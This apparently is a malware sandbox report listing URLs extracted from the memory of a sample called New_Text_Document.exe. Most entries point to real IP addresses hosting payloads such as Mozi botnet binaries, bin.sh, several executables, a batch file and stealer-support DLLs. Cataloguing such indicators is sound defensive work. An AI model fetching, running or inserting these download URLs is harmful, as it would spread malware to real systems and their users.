                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://71.206.76.245:54264/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://71.206.86.25:48746/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://71.206.95.150:14464/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://71.231.85.232:64081/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://71.234.109.199:62413/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://71.249.115.240:38382/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.131.114.175:61761/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.133.144.143:1471/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.180.148.249:37406/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.180.148.249:37406/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.180.148.249:37406/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.191.132.157:61592/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.214.69.226:45439/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.43.115.147:24389/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.43.71.36:44569/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.69.222.105:40116/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://73.1.136.88:9933/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://73.193.61.110:25307/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://73.195.209.120:14579/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://73.204.254.233:14793/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://73.215.150.232:22885/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://73.237.164.21:49878/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://73.244.22.82:57814/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://73.245.16.190:1996/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://73.51.146.212:53345/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://73.68.227.27:32288/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://73.84.102.251:9427/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://73.88.117.57:48564/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.101.1.208:38914/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.101.152.175:2588/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.206.74.87:1804/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.62.250.235:60375/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.87.121.238:1793/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.151.35.77:18770/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.191.246.57:54699/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.33.180.129:10851/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.64.136.240:15263/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.80.162.79:36218/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.88.251.198:55268/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.89.221.204:6587/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.89.221.205:6587/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.89.221.206:6587/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.99.143.195:28941/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.99.204.66:10986/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://76.132.134.84:21994/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://76.169.22.24:52302/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://76.175.27.104:16212/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://76.18.57.140:45936/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://76.226.160.251:53362/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://76.229.248.200:50206/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://76.50.182.40:23467/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://76.53.126.21:59594/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://76.94.65.41:58173/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.105.146.74/cc.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.120.179.203:4070/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.23.176.181:13623/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.237.25.210:35162/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.53.185.20:55929/Mozi.a
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.53.185.20:55929/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.65.45.186:9693/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.69.204.84:14002/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.79.135.225:31835/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.124.1/theme/Plugins/clip.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.124.1/theme/Plugins/clip64.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.000000000360C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.68.249
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.68.249/fuza/foto1661.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.68.249/fuza/nalo.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.000000000360C000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.68.249/fuza/tus.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.97.131/333/Eliz.bat
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.97.131/333/ed1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.97.131/333/info.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.97.131/333/information.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.97.131/333/invoicedata.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.97.146/6ccf1f8d6fe7b779/freebl3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.97.146/6ccf1f8d6fe7b779/mozglue.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.97.146/6ccf1f8d6fe7b779/msvcp140.dll
